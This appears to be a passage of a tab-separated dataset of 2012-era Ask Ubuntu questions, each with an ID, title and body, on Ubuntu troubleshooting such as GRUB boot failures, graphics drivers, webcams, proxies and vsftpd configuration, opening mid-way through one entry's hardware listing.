mxm_wmi video 19335 2 i915 , acer_wmi usb_storage 48838 1 ums_realtek sudo lshw -c network : *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 01 serial : b8:70 : f4:9a:35 : b6 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=half firmware=sb latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 memory : d3400000-d340ffff [ /quote ] [ quote ] *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 68 : a3 : c4 : eb:60:7d width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-19-generic firmware=n/a ip=192.168.0.168 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d2400000-d240ffff )
225618	what is the risk of destroying working software by upgrading from natty narwhal to oneric ocelot ?	i would like to know what happens with my good tuned system on natty narwhal when i upgrade to oneric-ocelot . i can not find any threads in the forum which is very strange . thanks for your answers in advance ciao roberto
225621	how to search for all the files starting with the name `` abc '' in a directory ?	i need to search for files starting with some particular name . there can be multiple files starting with a particular pattern and i want to list all such files present in the directory .
225626	grub is missing after installation	i installed ubuntu , but when i restarted my machine it shows : error : file '/boot/grub/i386-pc/normal.mod ' not found grub rescue > i tried running boot-repair from live cd here is the dump of that : http : //paste.ubuntu.com/1411870/ let me know if someone has done this before
225631	high temperature in a amd radeon hd4000/3000 series after upgrade	i was running 12.04 with unity 3d for 6 months ; my laptop ran almost silently and cool enough to hold on my lap with ~4 hours of battery life . i updated to 12.10 and switched to the gnome 3 shell . now my computer gets too hot to hold on my lap , the fan is constantly running on full blast , and i have about 45 minutes of battery life . the behavior is consistent between battery power and a/c power . this is the output of sensors : acpitz-virtual-0 adapter : virtual device temp1 : +84.0°c ( crit = +99.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +84.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +74.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +72.0°c ( high = +86.0°c , crit = +100.0°c ) core 2 : +75.0°c ( high = +86.0°c , crit = +100.0°c ) core 3 : +84.0°c ( high = +86.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +76.0°c i have an hp pavilion dv6 , intel i7 , amd radeon graphics . please let me know if you need additional information . what could be different between these two ubuntu editions that caused such a drastic change ? edit 1 : per @ paul 's suggestion , i ran htop to try to narrow down the problem . here is the result ! ( left side of terminal ) ( right side of terminal ) this is about 10 minutes after boot-up , htop , yakuake , and a chrome page with 1 tab opened to this question are all that i have manually opened . the most taxing program to the cpu is htop itself . i think that the problem must lie elsewhere ; my temps are already up to ~65c for the cpu and ~69c for the gpu , with nearly 0 % cpu usage . edit 2 : as requested by @ psusi , here is the output of 2 tabs from powertop ( changed my colors for readability ) : again , all i am manually running is one google-chrome tab and a yakuake terminal . i am fairly new to powertop , so i am unsure how to interpret this . let me know if you need info from the other tabs . edit 3 : i was having battery issues with 12.04 and fixed those by changing some lines in /etc/default/grub ; credit this question . grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor pcie_aspm=force i915.i915_enable_rc6=1 i915.lvds_downclock=1 i915.i915_enable_fbc=1 '' grub_cmdline_linux= '' pcie_aspm=force '' i have kept these lines the same after updating to 12.10 . do these look ok ? edit 4 : @ arup roy chowdhury mentioned that my amd drivers might not be installed correctly . i am currently using the following driver ( output from software-properties-gtk ) : should i be using a proprietary driver instead ? the gnome-shell seems to be running graphics acceleration ok with the open source one . edit 5 : @ hazrpg i have posted the log files you requested to ubuntu pastebin . here is the dmesg.log , lspci.log , and lsusb.log . see any issues ? edit 6 : @ sepero here are my idle temps . i am only running one terminal ~10 minutes after bootup . acpitz-virtual-0 adapter : virtual device temp1 : +64.0°c ( crit = +99.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +63.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +62.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +60.0°c ( high = +86.0°c , crit = +100.0°c ) core 2 : +60.0°c ( high = +86.0°c , crit = +100.0°c ) core 3 : +63.0°c ( high = +86.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +68.0°c just opening google-chrome to paste this edit for a minute has raised those temperatures by a few degrees each . my computer was not in the 60s prior to the update . fixed ! ! : problem solved . thank you to @ dra7 and @ yellowapple to pointing me in the direction of graphics card problems . i found this wonderful question and implemented @ nick andrik 's solution . in a nutshell , installing the proprietary drivers ( fglrx-updates ) from ppa : andrikos solved the problem . i can now use ati catalyst to choose my power mode and which graphics card ( intel or amd ) i want to use . my temperatures are down to ~44 degrees and battery life is up to ~4 hours again . i also installed jupiter , which improved battery and temperatures further . the open source drivers for amd seem to be getting better , however it looks like their support for hybrid graphics cards ( like mine ) is not quite up to spec . use the proprietary drivers for now .
225635	tether mobile phone to laptop using bluetooth	( i 'm not sure if this is an ubuntu or an android question - feel free to move it ! ) is it possible to connect my android jelly bean phone to my laptop using bluetooth so that the telephone can use the laptop 's internet connection ? android -- bluetooth -- > laptop -- ethernet -- > internet i 'm running 12.10 , the laptop has bluetooth and i 've been able to pair the two devices .
225639	transfer data from windows vista via ethernet to ubuntu 12.04	this is my first time using ubuntu . i want to transfer my files ( pictures , music , documents ) from windows vista to ubuntu via ethernet . i understand that i have to configure the ip but how do you that ? also , i read somewhere that i have to use samba ? but not sure if i have to install it in windows or both ? and how ? i would really appreciate your help . -engels
225642	dell inspiron hdmi not working inspiron-n5110	i`m now install ubuntu 12.10 the problem can not connect my laptop to the tv via hdmi i read the this post problem to find setep one /etc/bumblebee/bumblebee.conf this folder ( `` bumblebee '' ) does not exist . where is my mistake ? should i install graphics card drivers ? i tried to install the graphics card was useless in ubuntu 12.04 plz help me my laptop : dell inspiron-n5110 ram : 8gb vga : intell & nvidia gt525m ( hybrid graphics ) os : ubunto 12.10
225643	what tools are availble to check network performance for voip calls ?	i need a software tool which can emulate network impairments/jitters in the network and test voip calls behavior and quality .
225653	boot failure - nothing works	overnight , my ubuntu installation ( latest lts version ) has stopped working . apart from automatic updates , i never made any changes to the system . as of yesterday , the computer starts extremely slowly , eventually takes me to the grub screen , and after choosing the operating system , simply stops on a light purple screen . recovery boot does not work . does anyone have any idea how to fix this ? thanks
225654	grub2 attempting to boot hd1 when it should boot hd0	i 'm attempting to perform a `` normal '' install on a usb3 ssd ( i do n't know if it is noteworthy , but i do n't have a swap partition ) . the installation proceeds normally ( i 'm installing from a usb2 device i created using lili boot , with a copy of ubuntu 12.10 64bit that i downloaded directly from the source . the system i 'm running ubuntu on has had a more traditional installation of ubuntu running on it without issue ( also 12.10 ) , so i know that everything works a-ok when booting from a 7200rpm internal disk . there are a number of oddities that i 've noticed so far , including graphics corruption , but the first and most pressing issue is that grub2 refuses to recognize the correct hd . from /boot/grub/grub.cfg : if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 b58ee4f7-d41d-400a-b7b8-18bd1f0ae9d3 else search -- no-floppy -- fs-uuid -- set=root b58ee4f7-d41d-400a-b7b8-18bd1f0ae9d3 fi font= '' /usr/share/grub/unicode.pf2 '' fi this is from a 100 % fresh install of linux ( first boot ) , which was installed while no hard drives were connected to the system , other than the usb2 lili drive . the system refuses to boot unless i change the hd1 , msdos1 - > hd0 , msdos1 in the grub menu at boot , when it is the only disk device connected to the pc . what options are left for me to troubleshoot this issue ? i 've been racking my brains and taxing the internet trying to dig up something on this problem , but now i 'd like to see if the ubuntu community can rise to the challenge and help me fix this boot problem . this is the second time i 've attempted this particular setup . the first time , after days of wasted time , i managed to get it to boot every other boot - i.e . every even boot it would boot into ubuntu like it was happy ; every odd boot it would boot into the busybox or grub prompt . at one point it complained that it could n't find /dev/disk/by-uuid/ [ the disk ] , which i found most perplexing , since the disk was there and booted before and after the occurrence ( with intervention ) . update attempting to boot without changing hd1 - > hd0 gave me an alert before dropping into busybox : alert ! /dev/disk/by-uuid/ [ uid ] does not exist . dropping to a shell ! where is it getting hd1 from ?
225655	webcam does n't work in ubuntu 12.10	i have gembird cam68ut . on my ubuntu 12.10 it shows black screen in cheese and guvcview . i tested it in win7 , it works fine . here what i found : it is a uvc compliant camera , i checked on the site : 18ec:3299 usb 2.0 pc camera ( model number qc3231 ) arkmicro this webcam is report by lsusb : bus 001 device 004 : id 18ec:3299 arkmicro technologies inc . here is the output of dmesg | tail : uvcvideo : found uvc 1.00 device usb2.0 pc camera ( 18ec:3299 ) uvcvideo : uvc non compliance - get_def ( probe ) not supported . enabling workaround . input : usb2.0 pc camera as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5:1.0/input/input17 usbcore : registered new interface driver uvcvideo usb video class driver ( 1.1.1 ) when i run cheese ( or guvcview ) , here what i get in terminal : libv4l2 : error turning on stream : no space left on device ( cheese:11797 ) : cheese-warning ** : internal data flow error . i tried it on different usb slots with the same results the webcam 's microphone works , i can record audio with it update : i tested it on other two machines with the same ubuntu and it works without problems having the same dmseg | tail message . guys , may be it is a bug with usb controller driver in the kernel ( because on that machine camera works in win7 ) ?
225657	how to install ubuntu on hp envy 4 ultrabook ?	i want to install ubuntu on my hp envy-4 ultrabook . i tried installing it through a live cd but the computer hung on the very first screen showing 2 icons at the bottom . content of my cd shows wubi.exe instead of .iso file . i downloaded ubuntu-12.04-desktop-i386 .
225660	why is ubuntu running so slowly when installed alongside windows 8 ?	i recently bought a computer with windows 8 preinstalled on it , and installed ubuntu 12.04 . it ran well at first , but after some time , it started to slow down . this was more noticeable when i was playing games and changing the volume . i tried reinstalling ubuntu , but the problem persisted . windows 8 is running fine . i have an amd vision a8 processor ( 1.9 ghz ) and 8 gb of memory . i have the same problem with other distributions . does anyone know why i am having this problem or how to fix the problem ?
225662	my ubuntu software centre catalog does n't get updated	there are so many applications on ubuntu apps website which when i try to open with ubuntu software center , they are no where to be found !
225666	copy file and folder path from nautilus	how can i copy the file and folders full path in nautilus ? in the right-click context menu there is no such option provided . in file/folder property window i can only copy the folder path .
225667	ssl connection fails to authenticate certificates for some pages ?	this time , i am going to solve some irritating things with my networking on school , using ubuntu 12.10 . i am perfectly able to connect to the proxy authenticated network the school uses . but my problem is something else ; i am not able to access for example gmail.com or any ssl secured log-in pages . and where i am able to , i am not able to see any of the layout ( f.ex . facebook ) because the secure content is blocked . the thing is , i am able to connect to all those pages at home , but i am not able on the school proxy . so , could it be the proxy blocking the ssl connections , or the ssl certificates ? and i am able to reach those pages from windows without any problem . let me take an example for you : i open my browser , and the homepage is set to www.google.com , where i am usually logged in as a google-user . that would mean , https , and it 's secured . the browser asks me to put in the proxy authentication details , and then it warns me : security certificate is not trusted ! . and i just click `` proceed anyway '' x2 , and then i am able to go into google.com . for gmail , i am not able to see the `` proceed anyway '' button in chrome . it just says : `` back to safety '' . in firefox , i am not able to make an exception for the page either.. so , is there any way how i can access those pages from ubuntu , and not only windows ? i am a huge fan of ubuntu , and i have used it for a long time . so any help will be great ! thanks for reading , and i hope that someone is able to help me with this !
225680	how to globally disable antialiasing in ubuntu ?	i 'm using ubuntu 12.10 on a samsung r710 laptop which is equipped with a nvidia geforce 9600m gt . at the moment , proprietary driver v310.14 ( nvidia-experimental ) is installed . since my second monitor runs on full hd resolution , i 'd rather trade the antialiasing feature for increased performance . is it possible to disable antialiasing completely for all applications without having to disable it in every single app ? thanks in advance for your suggestions !
225681	i am trying to run the update manager	the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . i dont think i am running third party repositories ... but am unsure how to find out
225686	installing application packages on ubuntu usb	i 'm new to ubuntu . i downloaded the newest version on a usb stick then i booted my pc with the usb . upon trying out ubuntu i tried installing additional packages/applications , which worked fine . but when i then after tried using my ubuntu usb , the new installed apps were not there ! if i get that right , ubuntu would only install new packages to the actual pc i 'm using it on . not within ubuntu itself ! ? is there a way that i can install new applications to my ubuntu usb and it should stay within ubuntu so i can use it for other pc 's which do n't have an internet connection necessary to update/install packages ? thanks so much
225689	how to see what went wrong on a crossover app that crashed ?	i 've been using ubuntu half a year now and i want to know how to diagnose an app for problems . i have installed torchlight using crossover and it used to work but now all i can see is the mouse pointer when i start the app , i want to know why it happens and what i can do to fix it . please make your answer applicable to any crossover application .
225691	write application indicator with no icon	i wrote an application indicator that displays information about my monthly network consumption . i do not want it to have an icon next to the text i display . how do i write an application indicator without an icon ? the code i use to initialize my indicator is : self.indicator = appindicator.indicator.new ( `` voometer '' , `` network '' , appindicator.indicatorcategory.system_services ) reading the documentation i can not find the value to put instead of `` network ''
225693	what are the easy ways to install ubuntu remotely ?	gui ( graphical user interface ) metod preferred . for example - can the new remote login feature be used for the purpose if the remote person has ubuntu live cd and know how to boot it ? the built-in remote login feature in question has been described here ubuntu 12.10 login screen adds remote desktop access remmina maybe ? http : //askubuntu.com/a/16767/
225696	running arm ( el ) executables on arm ( hf ) system - missing symlink to dynamic loader ?	i am using an ubuntu 12.10 ( armhf ) distribution on a panda board . i want to run applications compiled for armel . it was not possible due to a changed dynamic loader location ( https : //wiki.linaro.org/officeofcto/hardfloat/linkerpathcallapr2012 ) i succeeded by creating the following symbolic link /lib/ld-linux.so.3 - > /lib/ld-linuxarmhf.so.3 is there a way to install a portability package instead ? is there a reason why this is not done by the distribution ? thanks in advance
225700	stop google chrome being the default browser in lubuntu 12.04	due to an issue presented here i was inclined to use google chrome instead of chromium . i have set firefox as the default browser and disabled that in google chrome , but the latter keeps opening the links in office writer ( for example ) . it is the same issue as here , except that here i use lubuntu , and the answer there is for gnome/unity , and i do not have that settings . or do i ?
225702	how do i fix google earth 6.2.2 theme and fonts in 12.04 ?	here is the problem . i would like to know how to get google earth using better fonts with anti-aliasing for english and japanese . do n't know what these fonts are but they are hideous and completely different from my system fonts or libre office fonts or even qt apps like vlc and minitube . i 'm using 12.04 lts 32bit and almost had complete success with the 11.10 fix posted here google earth and skype theme the theme and fonts will show up correctly for about 5 seconds before the program crashes .
225705	unable to login to ubuntu after upgrade to 12.10	ubuntu 12.10 upgrade results in blank screen after login after upgrading to 12.10 , i ca n't login anymore . the problem seems be related to graphic card ( computer is compaq c700 ) and new unity interface . i wonder if anyone have similiar problems and if some solution exists .
225714	nvidia drivers fail completely after update to 3.5.019	i 'm running a duel-screen set-up and need the proprietary drivers because the standard ones wo n't drive the second screen at full resolution . after updating to 3.5.019 , downloading the latest linux headers and re-installing `` nvidia-current-updates '' to trigger a recompile xserver/gdm wo n't load at all . help appreciated . edit : extra information xorg.0.lgo [ 5.102 ] ( ii ) loadmodule : `` glx '' [ 5.102 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 5.222 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 5.222 ] compiled for 4.0.2 , module version = 1.0.0 [ 5.222 ] module class : x.org server extension [ 5.222 ] ( ii ) nvidia glx module 304.51 tue sep 18 17:38:06 pdt 2012 [ 5.222 ] loading extension glx [ 5.222 ] ( ii ) loadmodule : `` nvidia '' [ 5.222 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 5.223 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 5.223 ] compiled for 4.0.2 , module version = 1.0.0 [ 5.223 ] module class : x.org video driver [ 5.223 ] ( ii ) nvidia dlloader x driver 304.51 tue sep 18 17:18:40 pdt 2012 [ 5.223 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 5.223 ] ( ++ ) using vt number 7 [ 5.225 ] ( ii ) loading sub module `` fb '' [ 5.225 ] ( ii ) loadmodule : `` fb '' [ 5.225 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 5.225 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 5.225 ] compiled for 1.13.0 , module version = 1.0.0 [ 5.225 ] abi class : x.org ansi c emulation , version 0.4 [ 5.225 ] ( ii ) loading sub module `` wfb '' [ 5.225 ] ( ii ) loadmodule : `` wfb '' [ 5.225 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 5.225 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 5.225 ] compiled for 1.13.0 , module version = 1.0.0 [ 5.225 ] abi class : x.org ansi c emulation , version 0.4 [ 5.225 ] ( ii ) loading sub module `` ramdac '' [ 5.225 ] ( ii ) loadmodule : `` ramdac '' [ 5.225 ] ( ii ) module `` ramdac '' already built-in [ 5.225 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 5.225 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 5.225 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 5.225 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 5.226 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 5.228 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 5.228 ] ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and [ 5.228 ] ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . [ 5.228 ] ( ee ) nvidia ( 0 ) : *** aborting *** [ 5.228 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 5.228 ] ( ii ) unloadmodule : `` nvidia '' [ 5.228 ] ( ii ) unloadsubmodule : `` wfb '' [ 5.228 ] ( ii ) unloadsubmodule : `` fb '' [ 5.228 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 5.228 ] fatal server error : [ 5.228 ] no screens found [ 5.228 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 5.228 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 5.228 ] ( ee ) [ 5.229 ] server terminated with error ( 1 ) . closing log file . dkms status : nvidia , 304.64 , 3.5.0-18-generic , x86_64 : installed nvidia , 304.64 , 3.5.0-19-generic , x86_64 : installed nvidia-current-updates , 304.51 , 3.5.0-19-generic , x86_64 : installed appropriate section of kernel log : dec 5 13:37:06 ursus kernel : [ 5.374507 ] nvrm : loading nvidia unix x86_64 kernel module 304.64 tue oct 30 10:58:20 pdt 2012 dec 5 13:37:06 ursus kernel : [ 5.624054 ] nvrm : api mismatch : the client has the version 304.51 , but dec 5 13:37:06 ursus kernel : [ 5.624054 ] nvrm : this kernel module has the version 304.64 . please dec 5 13:37:06 ursus kernel : [ 5.624054 ] nvrm : make sure that this kernel module and all nvidia driver dec 5 13:37:06 ursus kernel : [ 5.624054 ] nvrm : components have the same version .
225715	how do i make the nvidia graphics card the default ?	my laptop has both an onboard intel graphics card and a nvidia geforce with cuda and optimus . i installed bumblebee and can now run applications on the nvidia card by typing optirun [ application name ] in terminal . this works great . still , my laptop is plugged in most of the day , so it makes sense for ubuntu to always use the nvidia card by default . is there some way to force it into always using the nvidia card , or even better , to get it to use the nvidia card if it 's using mains power and use the intel graphics when it runs on battery power ?
225718	how do i install compiz `` window rules '' ?	at some point in time i discovered the `` window rules '' plugin within the compiz config manager . one can use that to automatically show some special application on every workspace for example ( so instead of each time `` click window title , select 'always on visible workspace ' ... you could write down a rule to do it for you ) . now ; with a fresh installation of 12.10 ... there are no more `` window rules '' within the compiz config manager . anyone aware of other ways to achieve similar behavior ?
225725	error in netbeans : `` can not find an htmlparser implementation for html5 ''	when i open a file in netbeans , i get a please wait ... on the first line of in the editor window . i also get an exception icon at the bottom of the screen which says : a org.netbeans.modules.parsing.spi.parseexception exception has occurred . however , the system should continue working without further problems . click show details for the stack trace . if i click on `` show more details '' , i get this : java.lang.illegalstateexception : can not find an htmlparser implementation for html5 at org.netbeans.editor.ext.html.parser.api.syntaxanalyzerresult.findparser ( unknown source ) at org.netbeans.editor.ext.html.parser.api.syntaxanalyzerresult.doparsehtml ( unknown source ) at org.netbeans.editor.ext.html.parser.api.syntaxanalyzerresult.parsehtml ( unknown source ) at org.netbeans.modules.html.editor.api.gsf.htmlparserresult.root ( htmlparserresult.java:133 ) at org.netbeans.modules.html.editor.api.gsf.htmlparserresult.roots ( htmlparserresult.java:172 ) at org.netbeans.modules.html.editor.gsf.htmlstructurescanner.folds ( htmlstructurescanner.java:158 ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.addtree ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.access $ 700 ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask $ 3.run ( unknown source ) at org.netbeans.editor.basedocument.render ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.scan ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.access $ 200 ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask $ 1.run ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask $ 1.run ( unknown source ) at org.netbeans.modules.parsing.impl.taskprocessor.callusertask ( unknown source ) at org.netbeans.modules.parsing.api.parsermanager $ usertaskaction.run ( unknown source ) at org.netbeans.modules.parsing.api.parsermanager $ usertaskaction.run ( unknown source ) at org.netbeans.modules.parsing.impl.taskprocessor $ 2.call ( unknown source ) at org.netbeans.modules.parsing.impl.taskprocessor $ 2.call ( unknown source ) at org.netbeans.modules.masterfs.filebasedfs.utils.filechangedmanager.priorityio ( filechangedmanager.java:168 ) at org.netbeans.modules.masterfs.providers.providedextensions.priorityio ( providedextensions.java:356 ) at org.netbeans.modules.parsing.impl.utilities.runpriorityio ( unknown source ) caused : org.netbeans.modules.parsing.spi.parseexception at org.netbeans.modules.parsing.impl.taskprocessor.runusertask ( unknown source ) [ catch ] at org.netbeans.modules.parsing.api.parsermanager.parse ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.gsffoldscan ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.run ( unknown source ) at org.netbeans.modules.csl.editor.fold.gsffoldmanager $ javaelementfoldtask.run ( unknown source ) at org.netbeans.modules.parsing.impl.taskprocessor.callparserresulttask ( unknown source ) at org.netbeans.modules.parsing.impl.taskprocessor $ compilationjob.run ( unknown source ) at java.util.concurrent.executors $ runnableadapter.call ( executors.java:471 ) at java.util.concurrent.futuretask $ sync.innerrun ( futuretask.java:334 ) at java.util.concurrent.futuretask.run ( futuretask.java:166 ) at java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1110 ) at java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:603 ) at java.lang.thread.run ( thread.java:679 ) i am using the stock netbeans ide 7.0.1 which is available directly from the ubuntu 12.04 repositories .
225735	booting ubuntu into the command line ?	how do i boot ubuntu by default into the cli using a multiuser runlevel ? i wish to still maintain my graphical desktop manager ( gdm or whatever replaced it ) since i do use that to switch between unity and awesome wm . i do however wish to boot by default into a cli login shell . i could then startx to start my gui if i need it . i am aware that ctrl-alt- ( f1-6 ) will open a separate tty instance with a login shell but it seems wasteful to have a gui running even if asleep if i am working purely from the command line .
225736	how do you set up proxy authentication service in ubuntu running inside vmware ?	here are the details : i run windows7 as host os . i run ubuntu12.04 in vmware . i use a proxy service to connect to the internet in windows . now that proxy service asks for my username and password every time i open a website in browser . i installed ubuntu on vmware . i have set up the same proxy address ( settings- > network ) in mozilla firefox of ubuntu . now whenever i open a website from firefox in ubuntu , it prompts me for a username and password . i enter the password and username and i get to browse what i want in ubuntu . now my problem is how do i run commands like sudo apt-get update from the terminal . i can run nslookup from terminal and can find ip addresses of certain sites , but i can not ping those sites .
225738	too many xruns in jack	i 'm getting a lot of xruns in jack -- about one every .5 seconds . i have been told that this is a very computer specific problem that could have a lot of causes . is there anyone here who could advise me on this ? when i start jack from terminal , nothing too startling comes up . but there might be some other diagnostic that someone can help with .
225743	huawei e303c problem / problema con modem huawei e303c	translated : i am really a new ubuntu user , but for some time ago , i have tried xubuntu and i liked it . because of this i went a little further to ubuntu . right now , i am having this problem . i use internet via a 3g modem , model huawei e303c . the isp service provided is with movistar in argentina . the problem is that i ca n't establish a connection with the modem . i mean , since i installed ubuntu and configured the broadband mobile access , it never seems to establish a connection to it . the modem is correctly recognized however . because of this , i tried to reinstall 12.10 ( downloaded the iso image ) , this time , before using my 3g modem , i updated the system and rebooted . then i proceeded to connect the 3g modem to the pc and to configure it . went to the network icon -- > edit connections ... -- > mobile broadband . from there i configured the modem since the default was movistar argentina . the curious thing is , after saving what i configured , i went to the network connection icon and for the first time , i could establish a connection , but there was no internet access from the modem . i tried loading some pages and they just stayed on `` loading ... '' . i then rebooted the pc again , but this time , i have n't been able to establish the connection . it caught my attention that ubuntu asked me to create a report about the problem , particularly with the usb section . the thing is , after all of this , my question is : how can i configured and establish a connection with my e303c 3g huawei modem in order to use the movistar 3g argentina service provided in my country . again many thanks , i am new to this system but i actually love it , specially the terminal . i love the fact that i can use commands to configure stuff . really hoping that somebody can help me . many thanks . ps : i do n't know a lot of english , this is why i used a translator , although i know is not the same . original : realmente soy novato en ubuntu , pero hace un tiempo había probado xubuntu y me gusto , por lo que fui un poco más alla . estoy teniendo este problema . uso internet a traves de un módem 3g , cuyo modelo es huawei e303c . el servicio es brindado por movistar argentina . el problema es que no puedo establecer una conexión con el mismo . o sea , desde que instalé ubuntu , configure la banda ancha móvil , nunca establece conexión , pero al modem lo reconoce . frente a esto , volví a reinstalar ubuntu 12.10 ( es la iso que descargue ) , esta vez , antes de usar mi módem 3g , actualicé todo el sistema . luego , reinicie , ahora con el módem 3g conectado . fui a editar las conexiones , banda ancha móvil , configure mi conexión tal cual es la predeterminada para movistar argentina . lo curioso , es que guarde , fui a la conexión y por primera vez pudo establecerse la conexión , pero igual no andaba internet ... quedaba cargando . reinicié la máquina , y nuevamente , no he podido establecer más la conexión . me llamó la atención , que ubuntu me pidio de informar un problema del sistema , y particularmente era con el usb-data , o algo asi . la cuestión , es que quisiera saber de que manera puedo configurar mi módem 3g huawei e303c para poder utilizar mi servicio de movistar 3g argentina . muchas gracias , soy nuevo en este sistema , pero realmente me encanta ... sobre todo la terminal ... me encanta poder usar los comando para configurar las cosas . espero que alguien pueda ayudarme . muchas gracias . pd : no manejo bien el inglés , por lo que utilicé un traductor , aunque se que no es lo mejor .
225745	dnsmasq has changed the way it works in 12.10 - can someone point me to documentation or info on the changes	the way dnsmasq works with 12.10 has changed again , from 12.04 . i have searched the ubuntu documentation and google for further info , without success . basically in 12.04 you could see the list of upstream dns servers passed to dnsmasq in the file /var/run/nm-dns-dnsmasq.conf . this file in 12.10 is empty , and with all the reading i have done , it appears to be being managed by dbus . i just need to know where this information is being stored , as it is causing us an issue with virtualbox , not correctly passing through the dhcp information . i know i could switch this service off , with the switch for the network manager service , but i would rather understand how the new system functions , and correct the issue there . any pointers to how this works gratefully received .
225746	how to get a list of files for a package i have n't installed yet ?	apt-cache search returns list of available packages . in my case i would like to look at the list of files that would be installed on my pc in case i install the package usb-creator-gtk . something like dpkg-query -l does for an already installed package . thanks for help .
225759	how much do i need for swap area ?	i have the .iso file of ubuntu 12.10 and i mount in on my flash drive using universal usb installer , i also shrink my disk with result of 42.5gb that is 'free space ' ( i really dunno why it cant be higher than that , im planning to use 60gb for may ubuntu side ) , in this first step im feel , im doing right . my laptop specs is 8gb of ram , i5-acer aspire-5750-6684,1tb harddrive 700gb for c : windows7homepremium and another d:300 is for backups/installer/etc . ( this is the disk part where i cut the 42.50gb that became 'free space ' ) now for booting phase , i read some of steps on doing dual boot but i dunno how much will i spend for 'swap area ' although i really dunno what it is ? t_t im new in ubuntu so im '0 ' it came to linux.i dunno if swap area can effect dual booting and bring error after installation.^^ if theres a lack of information about my specs please do remind me^^ ,
225760	how do i make thunderbird 17.0 stop notifying me with junk mail ?	i use a few email accounts with one dedicated to junk and spam . thunderbird is auto tagging them as spam/junk , but still displays them as unread mail . it 's not wrong , but it makes the pop up and unread counter kind of useless as i do n't know how much new mail i actually have ! i want thunderbird to not count junk mail as unread messages and not to notify me of them . ubuntu 12.10 , thunderbird 17.0 .
225761	vsftpd - restrict users to home directory	setup vsftpd easily if i run this config : listen=yes anonymous_enable=no local_enable=yes write_enable=no dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chroot_local_user=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem then i get an error message : 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) however , if i add in : allow_writeable_chroot=yes as suggested here , then it just fials to connect : connection attempt failed with `` econnrefused - connection refused by server '' . however , if i remove that line that was just added and perform sudo chmod a-w on the users home directory they can now connect but the service is pointless as they cant upload anything . is there a way to restrict users to just their home directory , and be able to connect and write to their home directory ? turning off chroot_local_user is not an option as they can then browse all the other users directories . stu
